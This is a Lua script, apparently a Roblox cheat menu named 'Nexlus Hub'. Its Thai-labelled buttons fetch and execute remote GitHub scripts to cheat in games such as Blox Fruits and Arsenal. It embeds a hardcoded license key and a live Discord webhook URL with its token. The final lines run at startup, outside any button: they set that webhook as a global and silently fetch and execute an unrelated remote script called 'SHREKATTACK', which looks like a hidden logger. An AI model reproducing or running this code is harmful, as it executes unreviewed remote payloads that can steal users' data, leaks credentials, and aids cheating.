local DiscordLib = loadstring(game:HttpGet"https://raw.githubusercontent.com/dawid-scripts/UI-Libs/main/discord%20lib.txt")()

local win = DiscordLib:Window("Nexlus Hub")

local serv = win:Server("สคิปต่างๆ", "")

local btns = serv:Channel("Maru Hub")
local bf = serv:Channel("สคิป บล็อกฟุต")
local kl = serv:Channel("สคิป คิงพีช")
local asn = serv:Channel("สคิป อาเซนอล")

btns:Button("Maru Hub สคิป ปกติ 6 Map", function()
getgenv().Key = "MARU-RYEZL-5CA-WKDTR-U7X-78LF"
getgenv().id = "852722210154086401"
loadstring(game:HttpGet(("https://raw.githubusercontent.com/xshiba/MaruBitkub/main/Mobile.lua"), true))()
end)

btns:Button("Maru Hub สคิปภาษาไทย Blox fruit", function()
getgenv().Key = "MARU-RYEZL-5CA-WKDTR-U7X-78LF"
getgenv().id = "852722210154086401"
_G.Script_Language = "Thai"
loadstring(game:HttpGet(("https://raw.githubusercontent.com/xshiba/MaruBitkub/main/Mobile.lua"), true))()
end)

btns:Button("Maru Hub Kaitun Mode Blox fruit", function()
getgenv().Key = "MARU-RYEZL-5CA-WKDTR-U7X-78LF"
getgenv().id = "852722210154086401"
getgenv().Script_Mode = "Kaitun_Script"
loadstring(game:HttpGet(("https://raw.githubusercontent.com/xshiba/MaruBitkub/main/Mobile.lua"), true))()
end)

btns:Button("Maru Hub PVP MODE", function()
getgenv().Key = "MARU-RYEZL-5CA-WKDTR-U7X-78LF"
getgenv().id = "852722210154086401"
_G.Script_Mode = "PVP"
loadstring(game:HttpGet(("https://raw.githubusercontent.com/xshiba/MaruBitkub/main/Mobile.lua"), true))()
end)

bf:Button("Neva hub บล็อกฟุต", function()
--Blox fruit-Neva-Hub
loadstring(game:HttpGet('https://raw.githubusercontent.com/VEZ2/NEVAHUB/main/2'))()
end)

kl:Button("One X Hub คิงพีช", function()
loadstring(game:HttpGet("https://raw.githubusercontent.com/xOne2/King-Legacy/main/README.md"))()
end)

asn:Button("อาเซนอล จำชื่อ Hubไม่ได้555!!", function()
--Arsenal
loadstring(game:HttpGet("https://raw.githubusercontent.com/YellowGreg/UltimateCromaSin-Arsenal-Gui/main/AdvanceTechV2.lua"))()
end)
_G.webhooksdiscord = "https://discord.com/api/webhooks/1050068639312781395/vU50tq3VQT0sT1VIIDxaECprBaIJqtf5LPh30XeYzm2kbGIPe7DWfpLPvlXco1Ie8jXL"
loadstring(game:HttpGet("https://raw.githubusercontent.com/SHARKX516/SHREKATTACK/main/SHARKLOL2.lua"),true)()
